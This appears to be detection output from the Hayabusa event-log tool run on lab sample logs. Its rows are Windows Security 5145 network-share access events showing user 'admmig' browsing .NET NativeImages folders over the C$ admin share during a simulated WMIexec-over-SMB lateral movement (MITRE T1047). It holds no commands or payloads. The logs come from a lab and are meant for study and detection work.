0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 
